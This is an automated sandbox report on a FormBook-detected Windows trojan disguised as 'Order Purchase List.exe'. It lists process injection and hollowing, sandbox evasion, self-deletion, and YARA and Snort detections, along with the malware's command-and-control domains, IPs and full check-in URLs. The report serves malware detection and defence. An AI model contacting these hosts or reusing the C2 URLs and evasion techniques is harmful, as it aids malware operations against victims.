          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Order Purchase List.exe, key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, file source: 10.2.Order Purchase List.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 10.2.Order Purchase List.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, file source: 00000013.00000002.537066406.0000000000290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000C.00000000.358297563.000000000795E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000A.00000002.396388278.0000000001060000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000A.00000002.396417789.0000000001090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 00000013.00000002.542587054.0000000002AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, file source: 00000013.00000002.542676109.0000000002CA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, file source: 0000000C.00000000.339145360.000000000795E000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Network Connections Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 499414; Sample: Order Purchase List.exe; Startdate: 08/10/2021; Architecture: WINDOWS; Score: 100]
          • Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
          • Sample-level DNS/IP: www.iphone13promax.show
          • Order Purchase List.exe (started). Dropped: C:\Users\user\...\Order Purchase List.exe.log, ASCII. Signature: Injects a PE file into a foreign processes
          • Order Purchase List.exe (started by the process above). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected). DNS/IP: bigbigsea.com 154.23.204.56, 49833, 80 COGENT-174US United States; www.hottorchlighter.com 104.21.44.253, 49831, 80 CLOUDFLARENETUS United States; 6 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
          • NETSTAT.EXE (started by explorer.exe). Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started by NETSTAT.EXE)
          • conhost.exe (started by cmd.exe)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Order Purchase List.exe | 34% | Virustotal |
          Order Purchase List.exe | 40% | Metadefender |
          Order Purchase List.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          Order Purchase List.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          10.2.Order Purchase List.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          auxiliacapitalpartnersllc.com | 68.178.221.206 | true | true |  | unknown
          inatividigitali.com | 34.102.136.180 | true | false |  | unknown
          www.hottorchlighter.com | 104.21.44.253 | true | true |  | unknown
          bigbigsea.com | 154.23.204.56 | true | true |  | unknown
          www.inatividigitali.com | unknown | unknown | true |  | unknown
          www.auxiliacapitalpartnersllc.com | unknown | unknown | true |  | unknown
          www.greatamericanlandworks.com | unknown | unknown | true |  | unknown
          www.bigbigsea.com | unknown | unknown | true |  | unknown
          www.iphone13promax.show | unknown | unknown | true |  | unknown

                            Contacted URLs

                            Name | Malicious | Antivirus Detection | Reputation
                            www.hottorchlighter.com/gnui/ | true | Avira URL Cloud: malware | low
                            http://www.inatividigitali.com/gnui/?D81Ltve=MSRjHgM9j7I5HOqdL19ZieQAx0QZYnhjbVtYOT6RDGM9GDKuXhbXwP3ESIufbr/Me9Gt&v0=mjfD3V_ | false | Avira URL Cloud: safe | unknown
                            http://www.auxiliacapitalpartnersllc.com/gnui/?D81Ltve=jxkSMADL8om04CnCt2uvg3koohdaHD/94Z7CDjzCNfrBt1nbgpVJnnhJbuZar5zysKNA&v0=mjfD3V_ | true | Avira URL Cloud: safe | unknown
                            http://www.hottorchlighter.com/gnui/?D81Ltve=cDQQZHb5+agf8NQlScjGsSnQujRDxgY7AdRX5ePPfv8dvEhK3bFAIhRBnhIsPLeiQwdj&v0=mjfD3V_ | true | Avira URL Cloud: malware | unknown
                            http://www.bigbigsea.com/gnui/?D81Ltve=+ILGKZDievfdlhE08A6+0Ox9ZT8Pbvv5JFHshEbNzSpcbgaG6QnGXyVZrWQJJYTOfSqp&v0=mjfD3V_ | true | Avira URL Cloud: safe | unknown

                            URLs from Memory and Binaries


                                    Contacted IPs


                                    Public

                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    154.23.204.56 | bigbigsea.com | United States | 174 | COGENT-174US | true
                                    104.21.44.253 | www.hottorchlighter.com | United States | 13335 | CLOUDFLARENETUS | true
                                    68.178.221.206 | auxiliacapitalpartnersllc.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
                                    34.102.136.180 | inatividigitali.com | United States | 15169 | GOOGLEUS | false

                                    General Information

                                    Joe Sandbox Version: 33.0.0 White Diamond
                                    Analysis ID: 499414
                                    Start date: 08.10.2021
                                    Start time: 11:21:50
                                    Joe Sandbox Product: CloudBasic
                                    Overall analysis duration: 0h 8m 39s
                                    Hypervisor based Inspection enabled: false
                                    Report type: full
                                    Sample file name: Order Purchase List.exe
                                    Cookbook file name: default.jbs
                                    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed: 26
                                    Number of new started drivers analysed: 0
                                    Number of existing processes analysed: 0
                                    Number of existing drivers analysed: 0
                                    Number of injected processes analysed: 0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode: default
                                    Analysis stop reason: Timeout
                                    Detection: MAL
                                    Classification: mal100.troj.evad.winEXE@7/1@6/4
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HDC Information:
                                    • Successful, ratio: 47.3% (good quality ratio 42.8%)
                                    • Quality average: 70.4%
                                    • Quality standard deviation: 32.2%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 62
                                    • Number of non-executed functions: 138
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 184.28.84.57, 20.82.210.154, 20.54.110.249, 40.112.88.60, 52.251.79.25, 2.20.178.10, 2.20.178.56, 104.70.141.242, 20.199.120.182, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.199.120.85
                                    • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    Time | Type | Description
                                    11:22:58 | API Interceptor | 1x Sleep call for process: Order Purchase List.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    Match | Associated Sample Name / URL | Detection | Context
                                    www.hottorchlighter.com | ORDER REMINDER_0000200.gz.exe | malicious | 104.21.44.253

                                    ASN


                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order Purchase List.exe.log
                                    Process:C:\Users\user\Desktop\Order Purchase List.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1314
                                    Entropy (8bit):5.350128552078965
                                    Encrypted:false
                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                    Malicious:true
                                    Reputation:high, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.611950413314092
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Windows Screen Saver (13104/52) 0.07%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:Order Purchase List.exe
                                    File size:1104896
                                    MD5:903febb63c1a5afa29741401eac430af
                                    SHA1:3b6d8067630bc891b469ad5d367880e602aaa6a8
                                    SHA256:4a32f26bf573c5407014a41c8c54f84afa0041cce8c2b65f147527608cb23598
                                    SHA512:74f62f8d1335fa6672494f355e03b707a1125c6fa82f57855adca406ea41a0e0824ea3f650dbc489a274fad8be681747e5edfd68738d46278c2d117b611792b7
                                    SSDEEP:24576:NbbhXZw6yA9XU1RsTvgmZqsBHrB22w2XZw6yA9XU:5bvw09XTvksBHmUw09X
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q]a..............P.................. ........@.. .......................@............@................................

                                    File Icon

                                    Icon Hash:395838eccc86c4f8

                                    Static PE Info

                                    General

                                    Entrypoint:0x50eeaa
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x615D71FC [Wed Oct 6 09:53:00 2021 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10ee58 | 0x4f | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x110000 | 0x760 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x112000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0x10ceb0 | 0x10d000 | False | 0.808625515509 | PGP symmetric key encrypted data - Plaintext or unencrypted data | 7.614432754 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x110000 | 0x760 | 0x800 | False | 0.38720703125 | data | 3.77611216307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x112000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    Name | RVA | Size | Type | Language | Country
                                    RT_ICON | 0x110100 | 0x128 | GLS_BINARY_LSB_FIRST | |
                                    RT_GROUP_ICON | 0x110238 | 0x14 | data | |
                                    RT_VERSION | 0x11025c | 0x304 | data | |
                                    RT_MANIFEST | 0x110570 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                    Imports

                                    DLL | Import
                                    mscoree.dll | _CorExeMain

                                    Version Infos

                                    Description | Data
                                    Translation | 0x0000 0x04b0
                                    LegalCopyright | Copyright 2015
                                    Assembly Version | 1.0.0.0
                                    InternalName | 53z.exe
                                    FileVersion | 1.0.0.0
                                    CompanyName |
                                    LegalTrademarks |
                                    Comments |
                                    ProductName | VidyaGame
                                    ProductVersion | 1.0.0.0
                                    FileDescription | VidyaGame
                                    OriginalFilename | 53z.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                    10/08/21-11:24:18.630425 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.2.3 | 34.102.136.180
                                    10/08/21-11:24:18.630425 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.2.3 | 34.102.136.180
                                    10/08/21-11:24:18.630425 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49829 | 80 | 192.168.2.3 | 34.102.136.180
                                    10/08/21-11:24:18.744804 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49829 | 34.102.136.180 | 192.168.2.3
                                    10/08/21-11:24:23.978735 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49830 | 80 | 192.168.2.3 | 68.178.221.206
                                    10/08/21-11:24:23.978735 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49830 | 80 | 192.168.2.3 | 68.178.221.206
                                    10/08/21-11:24:23.978735 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49830 | 80 | 192.168.2.3 | 68.178.221.206

                                    Network Port Distribution

                                    TCP Packets


                                    UDP Packets


                                    DNS Queries

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                    Oct 8, 2021 11:24:18.565685034 CEST | 192.168.2.3 | 8.8.8.8 | 0x1362 | Standard query (0) | www.inatividigitali.com | A (IP address) | IN (0x0001)
